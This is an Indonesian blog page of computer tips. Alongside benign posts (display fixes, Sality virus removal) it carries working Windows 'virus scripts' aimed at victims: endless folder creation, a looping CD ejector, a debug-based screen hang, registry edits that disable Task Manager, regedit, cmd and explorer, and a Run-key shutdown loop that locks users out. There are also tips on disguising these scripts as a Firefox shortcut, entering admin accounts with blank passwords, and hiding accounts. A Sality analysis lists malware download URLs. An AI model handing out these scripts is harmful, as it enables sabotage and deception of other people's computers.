Showing posts with label Belajar Komputer. Show all posts
Showing posts with label Belajar Komputer. Show all posts

Nggak Bisa Full Screen Saat Main Game Di Windows 7

Nggak bisa full screen saat main game di windows 7 ? ni tipsnya

A. Solusi buat VGA berbasis NVIDIA Geforce
Memang pada beberapa driver Windows 7 u/ VGA Nvidia memang ada keluhan bug pada settingan "Flat Panel Scaling" nya. Yang dapat mengakibatkan beberapa problem seperti blank screen, maupun aplikasi yang ga bisa full screen.

Untuk mengatasi masalah tersebut Anda tidak perlu repot wat cari2 & ganti2 driver Nvidia yang lain.
  1. Cukup lakukan langkah berikut :
  2. Klik kanan desktop Windows 7 kamu
  3. klik Nvidia control panel (untuk yang menggunakan Driver Nvidia)
  4. Lalu pilih Advance setting
  5. Arahkan di tab Display pilih "Change flat panel scaling"
  6. Pilih Do not scale
  7. Close Nvidia control panel


B. Solusi buat VGA berbasis ATI Radeon
VGA ATI, Fullscreen untuk aplikasi yang berukuran 4:3 (Layar PC) pada monitor wide (Layar Lebar / LCD)
  1. Buka Catalyst Control Center
  2. Dari menu drop down di atas, klik "Desktop & Displays"
  3. Di bawah, akan ada list monitor2 yg bisa digunakan. pada pilihan monitor yg aktif, klik segitiga hitamnya, dan pilih "Configure...". Kalo ga muncul, berarti ente salah ngeklik segitiganya.
  4. Setelah itu akan muncul "Notebook Panel Properties". Pilih tab "Attributes".
  5. Pada "Scalling Option", pilih yang "Full Screen" atau "Maintain Aspect Ratio", jangan yg "Center".
  6. Kalo "Scalling Option" ga bisa dipilih alias berwarna abu2, ubah dulu resolusi desktop nya ke resolusi yg lebih rendah. Lalu coba kembali untuk merubah "Scalling Option" nya.
  7. Setelah dirubah, kembalikan resolusi desktopnya ke settingan yg biasanya digunakan.
  8. Coba test dengan aplikasi fullscreen yang cuma punya opsi 4:3 display ratio. aplikasi/game akan fullscreen!
Read more »

Tags : ,

Membuat Akun Rahasia Pada Windows XP

 

Dalam Windows XP, kita mengenal adanya User Account yaitu merupakan fitur multiuser pada windows XP yang memungkinkan 1 komputer digunakan oleh beberapa user dengan akun yang berbeda. Pada akun-akun user ini dimungkinkan pengaturan-pengaturan software yang berbeda serta dapat meningkatkan keamanan komputer yang digunakan oleh banyak orang. Kita bisa melihat banyaknya akun user pada Windows XP saat layar log in windows, disitu terdapat nama akun yang ada.

Tahukah anda? Kita bisa membuat akun rahasia, yakni akun user yang tidak akan terlihat pada layar Log In Windows tersebut. Cara membuat akun tersembunyi ini adalah dengan memodifikasi nama akun pada registri. Untuk lebih lengkapnya baca selanjutnya, OK...... :

1. Klik Start > Run dan ketik Regedit
2. Kemudian tuju ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList.
3. Buat DWORD value dengan cara klik kanan New > DWORD Value.
4. Berikan nama yang sama dengan akun yang anda ingin sembunyikan. Misalkan anda
ingin menyembunyikan Contoh:StealthAccount, beri nama DWORD value yang baru anda buat
tadi diganti dengan nama Rifaiy".
5. Setelah itu masukkan value datanya menjadi 0 (nol) dengan cara klik Rifaiy (DWORD yang sudah ganti menjadi nama akun anda), untuk menyembunyikan akun tersebut.
6. Kemudian Save / simpan setingan tersebut.
7. Dan Kemudian keluar dari Registry Editor dan restart komputer.
 
Dan lihat hasilnya User acoount anda kini telah tersembunyi. Lalu bagaimana untuk logon? Gampang, pada layar Log In tekan kombinasi tombol CTRL + ALT + Del “dua kali”, maka akan muncul kotak dialog Windows Logon. Masukkan username dan password dan klin Log In.

Untuk Mengembalikan / menampilkanya kembali anda cukup menghapus DWORD yang sudah di ganti dengan nama akun Anda seperti Contoh di atas namanya Rifaiy. Yang letaknya sama yaitu di HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList.Yang berada di dalam REGEDIT.
Read more »

Tags : ,

Virus Script yang Dapat Membuat Ribuan Folder Secara Otomatis

Kali ini anda akan mengetahui cara membuat ribuan folder dalam satu kali klik. Ribuan Folder tersebut akan menempati sebuah tempat dimana anda meletakan file virus tersebut. Jika dibiarkan file virus tersebut akan terus membuat folder secara cepat dan tanpa henti. Jika anda ingin menghentikannya anda hanya cukup menghapus file tersebut.
Berikut adalah cara pembuatannya:

1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
@echo off
:top
md %random%
goto top
---------------------------akhir skript---------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".bat", misal Hx.bat.

Untuk mengelabui korban buatlah shortcut yang familiar seperti firefox lalu ubah target shortcut tersebut mengarah ke letak file virus tersebut.
____________________________________________________________________





----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Beranggung Jawab----
Read more »

Tags : ,

Hack Password Account Windows XP

Tutorial ini akan menjelaskan tentang proses hacking terhadap account Windows XP. Yang dibutuhkan hanyalah aplikasi dasar windows yaitu command promptdan satu account kosong,bisa berupa Administrator,Limited ataupun Guest.

Berikut Tutorialnya :

1. Saat sudah muncul layar untuk memilih account dan tempat passwordnya, tekan Ctrl-Alt-Del. Lalu akan?muncul layar berisi kotak name dan password.
2. Hapus tulisan di kotak name dan ketik administrator.
3. Passwordnya tidak perlu diisi (Jika tidak bisa masuk berarti administrator sudah diberi password oleh penggunanya).
4. Lalu tekan OK. Maka langsung masuk windows sebagai administrator (kalau Account Administrator tidak diberi Password Saat penginstalan).

Setelah setelah anda bisa masuk, kita dapat mengubah password administratornya. Caranya adalah sebagai berikut :
1. Masuk user account baik dengan masuk control panel lalu masuk user account ataupun dengan mengklik gambar account di kiri atas menu start.
2. Setelah anda masuk ke user account anda bisa mengganti / menghapus password penguna bahkan bisa membuat user baru.






----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Beranggung Jawab----
Read more »

Tags : ,

Menampilkan Pesan Sebelum Masuk Windows

Kali saya akan membahas cara agar pesan anda ditampilkan setiap sebelum masuk windows. pesan tersebut bisa berupa teror, ancaman dll. Korban akan panik ketika dilayar komputernya terdapat sebuah pesan yang tidak pernah ia buat. Berikut Caranya:

Cara 1

1. buka control panel.

2. klik switch to clasic view.

3. kalau sudah klik administrative tools, lalu klik Local Security Policy.

4. lalu klik Local Policies, lalu klik Security Options.

5. klik Path Interactive logon:message title for users attempting to log on atau message title for users attempting to log on .

6. lalu isikan pesan yang ingin ditampilkan.

7. klik ok, dan program tersebut sudah bisa di akses.

Cara 2

1. Buka Regedit (Klik Start, Run ,Ketikan Regedit, lalu klik ok.)

2. Masuk ke HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon .

3. Di sebelah kanan terdapat String LegalNoticeText, klik 2x dan isi dengan pesan. Untuk judul pesan isi di LegalNoticeCaption.

4. Restart komputer untuk melihat hasilnya.

Cara 3

1. Buka notepad.exe dengan mengetikan dikotak run "notepad.exe".

2. Tuliskan Skript Berikut:

---------------Skript---------------

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeText /t Reg_SZ /d "pesan yang ingin ditampilkan" /f

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v LegalNoticeCaption /t Reg_SZ /d "judul pesan" /f

---------------Skript--------------------

3. Save dalam bentuk file Bat (Save as, lalu klik Save type as,lalu pilih all files. Save dengan nama *.bat, misal Rifaiy.bat)

4. Klik 2x File tersebut.

5. Restart Komputer untuk melihat hasilnya.

----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Beranggung Jawab----
Read more »

Tags : ,

Membuat CD Drive Buka-Tutup Secara Otomatis Dengan Virus Script

Dalam bahasa pemrograman banyak skript yang memiliki fungsi tertentu misalnya untuk membuka CD drive tanpa menekan tombol open atau mengklik menu eject. Dengan demikian skript tersebut dapat digunakan menjadi virus atau untuk mengerjai korban kemungkinan didalam skript dibawah terdapat komposisi yang mematikan. Berikut adalah cara membuat dan susunan skriptnya:

Berikut Virus Scriptnya

1. Buka Notepad

2. Copy dan Paste skript Berikut:

---------------------------Skript------------------------------

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 1000
loop

---------------------------akhir skript---------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal: Rifaiy.vbs.


____________________________________________________________________


----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Beranggung Jawab----
Read more »

Tags : ,

Membuat Kecelakaan Pada Layar Komputer Dengan Virus Script

Pada dasarnya Tutorial kali ini akan membuat Layar korban menjadi menampilkan warna acak lalu langsung Hang. Tutorial ini termasuk level menengah karena bisa menyebabkan kerusakan pada layar komputer/ monitor dan juga VGA(hehehe tidak separah itu sih, virus ini hanya bekerja seperti kita menjalankan game tapi terlalu berat maka terjadi Hang). dan yang bisa dilakukan adalah merestart komputer. Virus script ini bekerja hanya satu kali pada saat itu, seperti kita menjalankan aplikasi saja. Berikut adalah cara pembuatannya:


Virus Script

1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
---------------------------akhir skript---------------------------

3. Save as, ubah save as type menjadi "all files", simpan dengan format ".bat", misal Rifaiy.bat.

Untuk mengelabui korban buatlah shortcut yang familiar seperti firefox lalu ubah target shortcut menjadi letak file virus tersebut.
____________________________________________________________________








----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Beranggung Jawab----
Read more »

Tags : ,

Mematikan Semua Kontrol Utama Komputer Dan Mengembalikanya

Dalam suatu sistem komputer terdapat berbagai aplikasi yang memiliki fungsi tertentu untuk mengatur dan mengkoordinasi sistem tersebut. Aplikasi tersebut adalah suatu program yang disediakan oleh sistem untuk mengontrol atau mengatur berbagai pengaturan dalam sistem tersebut. Aplikasi tersebut seperti Registry Editor, Command Prompt, Windows Explorer, Task Manager dan Local Security Settings. Suatu sistem memiliki kelemahan dalam melindungi agar program tersebut terjaga atau tidak rusak. Berikut adalah Cara Mematikan Semua Kontrol Utama Komputer:
Berikut Cara Mematikan Aplikasi kontrol utama Komputer anda dengan menggunakan virus script/registri script

1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer /v DisallowRun /t Reg_DWORD /d 1 /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t Reg_DWORD /d 1 /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 2 /t Reg_Sz /d cmd.exe /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 3 /t Reg_Sz /d explorer.exe /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 4 /t Reg_Sz /d regedit.exe /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 5 /t Reg_Sz /d secpol.msc /f
---------------------------akhir skript---------------------------

3. Kalau sudah pilih pada Notped File, Save as, ubah save as type menjadi "all files", simpan dengan format ".bat", misal Rifaiy.bat.

4. Jika anda mengklik file ".bat" tersebut, anda akan mematikan akses Registry Editor, Command Prompt, Windows Explorer, Task Manager dan Local Security Settings.




Jika Aplikasi kontrol utama Komputer anda sudah dimatikan oleh virus, untuk mengembalikanya. yaitu dengan:


1. Buka Notepad

2. Copy dan Paste skript Berikut:

------------------------------Skript------------------------------
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer /v DisallowRun /f
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /f
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 2 /f
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 3 /f
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 4 /f
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\disallowrun /v 5 /f
---------------------------akhir skript---------------------------
3. Kalau sudah pilih pada Notped File, Save as, ubah save as type menjadi "all files", simpan dengan format ".bat", misal Rifaiy.bat.

4. Jika anda mengklik file ".bat" tersebut, anda akan menyalakan kembali akses Registry Editor, Command Prompt, Windows Explorer, Task Manager dan Local Security Settings


Cara Diatas Berlaku untuk Windows
____________________________________________________________________

----Gunakanlah Pengetahuan Andal Dengan Bijak Dan Beranggung Jawab----
Read more »

Tags : ,

Mematikan Akses Komputer (Shutdown Otomatis) Dan Cara Menanggulanginya

Tutorial ini merupakan salah satu cara ekstrim agar korban tidak bisa mengakses komputernya, yaitu dengan membuatnya Shutdown secara Otomatis. Korbar tidak akan bisa mengakses Accountnya karena setiap kali ia logon, akan tershutdown secara otomatis.Namun ada Cara Menanggulanginya. Berikut Cara2nya:

Membuat Script Virus

1. Buka Notepad.exe
2. Tuliskan Skript Berikut:

----------------------------------------Skript-------------------------------------------------


REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\run /v Hx /t Reg_SZ /d d:\Rifaiy.bat /f
shutdown /s


------------------------------------------------------------------------------------------------

3. simpan di Drive D atau (D:\) atau Di Drive E atau (E:\) dengan nama Rifaiy.bat. Jika ingin mengubah nama namanya, anda hanya perlu memodifikasi skript yang sudah saya kasi tanda.

4. jika korban meng-klik file tersebut, maka korban tidak akan bisa mengakses komputer tersebut.


Penanggulangan

1. Restart komputer anda
2. saat boot menu anda pilih menu save mode
3. jika sudah masuk anda tinggal menghapus file yang dicurigai sebagai virus. (Namun jika tidak bisa masuk saat save mode maka ada file system anda yang rusak atau hilang)




__________________________________________________________________


----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Bertanggung Jawab----
Read more »

Tags : ,

Memblokir dan Mengatasi Task Manager dan Registry Tools yang di Blokir

Banyak Virus yang membuat akses terhadap Task Manager dan Registry Editor atau Regedit menjadi terblokir atau tidak bisa digunakan. agar virus tersebut dapat menguasai akses komputer korban dan korban tidak bisa menghentikan proses virus tersebut, oleh karena itu saya mempostingkan cara ini.Baiklah langsung saja cara kali ini membahas tentang cara memblokir dan mengembalikan akses Task Manager dan Registry Tools.
Berikut Cara Memblokir:

Cara 1

1. Buka notepad.exe dengan mengetikan dikotak run "notepad.exe".

2. Tuliskan Skript Berikut:

---------------Skript---------------

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /t Reg_Dword /d 1 /f

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t Reg_Dword /d 1 /f

---------------Skript--------------------

3. save file tersebut, klik all files pada kotak pilihan, save dengan format (.bat), contoh: hx.bat.

4. jika korban mengklik file tersebut maka akan langsung terblokir Script diatas dibaca Virus Untuk Anda yang Memakai Antivirus Luar.

Cara 2

1. buka control panel.

2. klik switch to clasic view.

3. kalau sudah klik administrative tools, lalu klik Local Security Policy.

4. lalu klik Software Restriction Policies dan klik Additional Rules.

5. klik kanan pada sub folder Additional Rules, pilih New Path Rule.

6. lalu plih browse, pilih program yang ingin di blokir. misalnya "c:\windows\regedit.exe"

7. lalu klik ok, dan program tersebut sudah terblokir.

Cara Mengembalikan Task Manager yang terblokir:

Cara 1

1. Buka notepad.exe dengan mengetikan dikotak run "notepad.exe".

2. Tuliskan Skript Berikut:

---------------Skript---------------

REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableTaskMgr /f

REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f

---------------Skript--------------------

3. save file tersebut, klik all files pada kotak pilihan, save dengan format (.bat), contoh: hx.bat.

4. jika korban mengklik file tersebut maka akan bisa kembali mengakses Task Manager Dan Registry Tools.

Cara 2

1. buka control panel.

2. klik switch to clasic view.

3. kalau sudah klik administrative tools, lalu klik Local Security Policy.

4. lalu klik Software Restriction Policies dan klik Additional Rules.

5. klik kanan pada sub folder Additional Rules, Hapus Path yang Memblokir Task Manager atau Regedit.

6. lalu klik ok, dan program tersebut sudah bisa di akses.





----Gunakanlah Pengetahuan Anda Dengan Bijak Dan Bertanggung Jawab----
Read more »

Tags : ,

Cara Menghilangkan Menu Log On to Windows

Menu log on mungkin bagi orang2 yang ga mau repot hehehe. itu sangat mengganggu karena di lain sisi kita harus mekasukan nama dan password kita (bagi yang windownya sering di update). Menu log on sebenarnya dapat diubah menjadi otomatis dengan kata lain dihilangkan sehingga user tidak perlu repot2 lagi memasukkan username dan password. Langsung saja gini caranya:

Klik Start >> RUN

Kemudian Ketik control userpasswords2 >> OK

Hilangkan centang pada Users must enter a user name and password to use this computer >> Apply


Isi nama account yang ingin anda gunakan gagar langsung masuk ke desktop tanpa password (disini anda bisa memilih user name yang ingin anda gunakan dan tidak harus Administrator).

>> OK >> OK. Selesai Deh.
Read more »

Tags : ,

Virus Sality


Virus W32/Sality cenederung merusak system komputer kita, biasanya firus ini menginfeksi file-file berformat exe/com/scr di komputer kita, yang pertama di serang pada komputer, biasanya adalah registri kita, kemudian file-file yang sedang berjalan. Terkecuali antivirus, virus ini biasanya mematikan kerja antivirus setelah banyak menginfeksi file-file. virus ini bekerja sangat cepat dan tesembunya, sehingga tidak terdeteksi oleh antivirus. File yang terinfeksi Virus W32/Sality ukuran file akan bertambah besar beberapa KB dan file yang sudah terinfeksi W32/Sality ini masih dapat di jalankan seperti biasa. Biasanya virus ini akan mencoba untuk blok program antivirus atau removal tools saat dijalankan serta mencoba untuk blok task manager atau “registry editor” Windows. Untuk mempermudah dalam proses penyebarannya selain memanfaatkan “File Sharing” dan “Default Share” virus ini juga akan memanfaatkan media Flash Disk dengan cara membuat file acak yang mempunyai ekstensi exe/com/scr/pif serta menambahkan file autorun.inf yang memungkinkan virus dapat aktif secara otomatis setiap kali user mengakses Flash Disk.

Untuk blok task manager atau Registry tools, W32/Sality ini akan membuat string pada registry berikut:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system

> DisableRegistryTools
> DisableTaskMgr

Pada saat file yang terinfeksi W32/Sality, ia akan mendekrip dirinya dan mencoba untuk kopi beberapa file *.dll (acak) file DLL kemudian akan menginjeksi file lain yang aktif di memori serta file lain yang terdapat di komputer dan jaringan (file sharing) serta menginfeksi file *.exe yang terdapat dalam list registry berikut sehingga memungkinkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.

> HKLM\Software\Microsoft\Windows\CurrentVersion\Run
> HKCU\Software\Microsoft\Windows\CurrentVersion\Run
> HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

Berikut beberapa contoh file *.dll yang akan di drop oleh W32/Sality.

> C:\Windows\system32\syslib32.dll
> C:\Windows\system32\oledsp32.dll
> C:\Windows\system32\olemdb32.dll
> C:\Windows\system32\wcimgr32.dll
> C:\Windows\system32\wmimgr32.dll

Selain membuat file DLL, sality juga akan membuat file *.sys [acak] di direktori “C:\Windows\system32\drivers” [contoh: kmionn.sys]

W32/Sality.AE juga akan mencoba untuk merubah regisrty berikut:

> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Setting\"GlobalUserOffline" = "0"

> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxx [xxx adalah acak, contoh : abp470n5]
> HKEY_CURRENT_USER\Software\[USER NAME]914
> HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WMI_MFC_TPSHOKER_80
> HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER

Selain itu ia juga akan mencoba untuk merubah beberapa string registry Windows Firewall berikut dengan menambahkan value dari 0 menjadi 1:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center

> AntiVirusDisableNotify
> AntiVirusOverride
> FirewallDisableNotify
> FirewallOverride
> UacDisableNotify
> UpdatesDisableNotify

dan membuat key “SVC” serta string berikut dengan value 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc

> AntiVirusDisableNotify
> AntiVirusOverride
> FirewallDisableNotify
> FirewallOverride
> UacDisableNotify
> UpdatesDisableNotify

Tak cuma itu W32/s\Sality.AE juga akan menghapus key “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG”.

ALG atau Application Layer Gateway Service adalah services yang memberikan support untuk plug-in protokol aplikasi dan meng-enable konektivitas jaringan / protokol. Service ini boleh saja dimatikan. Dampaknya adalah program seperti MSN Messenger dan Windows Messenger tidak akan berfungsi. Service ini bisa dijalankan, tetapi hanya jika menggunakan firewall, baik firewall bawaan Windows atau firewall lain. Jika tidak komputer yang terinfeksi virus ini akan mengalami celah keamanan yang serius.

Blok akses “safe mode”

Dalam rangka “mempertahankan” dirinya, W32/Sality.AE juga akan mencoba untuk blok akses ke mode “safe mode” sehingga user tidak dapat booting pada mode “safe mode” dengan menghapus key yang berada di lokasi di bawah ini :

> HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
> HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot
> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

Injeksi file exe/com/scr

Tujuan utama dari virus ini adalah mencoba untuk menginjeksi program instalasi dan file yang mempunyai ekstensi exe/com/scr yang ada di drive C - Y terutama file hasil instalasi (file yang berada di direktori C:\Program Files) dan file-file portable (file yang langsung dapat dijalankan tanpa perlu instal), ia juga akan menginfeksi file yang mempunyai ekstensi “.exe” yang terdapat dalam list registry berikut sehingga memungkinkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.

> HKLM\Software\Microsoft\Windows\CurrentVersion\Run
> HKCU\Software\Microsoft\Windows\CurrentVersion\Run
> HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache

mencoba untuk melakukan koneksi ke sejumlah alamat web yang sudah ditentukan dengan tujuan untuk memanggil/mendownload trojan/virus lainnya yang di sinyalir merupakan varian dari versi sebelumnya yang memungkinkan virus ini dapat mengupdate dirinya.

[http://]pedmeo222nb.info
[http://]pzrk.ru
[http://]technican.w.interia.pl
[http://]www.kjwre9fqwieluoi.info
[http://]bpowqbvcfds677.info
[http://]bmakemegood24.com
[http://]bperfectchoice1.com
[http://]bcash-ddt.net
[http://]bddr-cash.net
[http://]btrn-cash.net
[http://]bmoney-frn.net
[http://]bclr-cash.net
[http://]bxxxl-cash.net
[http://]balsfhkewo7i487fksd.info
[http://]buynvf96.info
[http://]89.119.67.154/tes[xxx]
[http://]oceaninfo.co.kr/picas[xxx]
[http://]kukutrustnet777.info/home[xxx]
[http://]kukutrustnet888.info/home[xxx]
[http://]kukutrustnet987.info/home[xxx]
[http://]kukutrustnet777.info
[http://]www.kjwre9fqwieluoi.info
[http://]kjwre77638dfqwieuoi.info
http://mattfoll.eu.interia.pl/[sensor]
http://st1.dist.su.lt/l[sensor]
http://lpbmx.ru/[sensor]
http://bjerm.mass.hc.ru/[sensor]
http://SOSiTE_AVERI_SOSiTEEE.[sensor]

Mengeksploitasi Default Share dan Full Sharing
W32/Sality akan menyebar dengan cepat melalui jaringan dengan memanfaatkkan default share windows atau share folder yang mempunyai akses full dengan cara menginfeksi file yang mempunyai ekstensi exe/com/scr. Karena itu, Vaksincom menyarankan pengguna komputer untuk menonaktifkan Default Share (C$, D$ .. dst) dan hindari Full Sharing folder anda di jaringan.

Untuk cara membersihkan W32/Sality Klik Disini
Read more »

Tags : ,

Cara Menghilangkan Virus Sality dan Infeksinya

Saya akan berbagi sedikit Pengetahuan tentang menghilangkan virus sality dan infeksinya, karena banyak sekali diwarnet file2 yang terinfeksi virus yang berformat exe (aplikasi). Oh iya aplikasi2 yang terinfeksi virus itu jangan di jalankan karena jika di jalankan maka komputer kamu akan terinfekis virus. Cara membersihkanya dibawah ini.

Catatan: sebelumnya jang membuka aplikasi2 lain selama virus belum hilang semua atau proses pembersihan di bawah ini belum selesai.
Kemungkinan besar Avira dan antivirus lain tidak dapat di jalankan karena itu, Pertama2 kita jalankan Sality Off yang sudah di download dari 4shared, Klik 2 kali, tunggu sampai proses scan selesai.


Setelah proses scan selesai, kita mulai jalankan Avira, bagi yang belum punya download disini, yang tentunya sudah di Update yang belum update disini. Secan semua Hard Drive Dengan Avira caranya klik 2 kali icon Avira yang ada di Desktop akan muncul gambar seperti ini:


Setelah muncul.
> kita klik Local Protection
> kemudian pilih Scanner
> Kemudian kita buka Manual Selection
> Ceklis (v) semua Hard Drive


kemudian klik tombol
Tunggu sampai proses Scan selesai.


> Setelah selesai akan muncul daftar2 vile yang terinfeksi virus sality.


Setelah muncul dafta2 virusnya kita perbaiki dengan cara
> Klik kanan pada file yang terkena virus sality
> Pilih Repair
(catatan: mungkin ada beberapa file yang tidak bisa di repair. dan cara merepairnya satu persatu seperti cara di atas.)


kemungkinan pada saat Merepair file satu-persatu akan sering muncul layar seperti ini: diksrenakan Avira yang digunakan adalah Avira Personal


Setelah merepair virus2 tersebut kita Klik Apply Now


Setelah klik Apply Now akan muncul seperti ini:


Tunggu sampai selesai, kira kira 1jam untuk proses scan, tapi kalau file yang disecanya banyak ya akan lebih lama. Setelah selesai akan muncul seperti ini:


Selamat komputer / Laptop anda sudah bersih dari virus sality.
Yang gambar diatas tinggal klik Close dan klik End Selesai.
Read more »

Tags : ,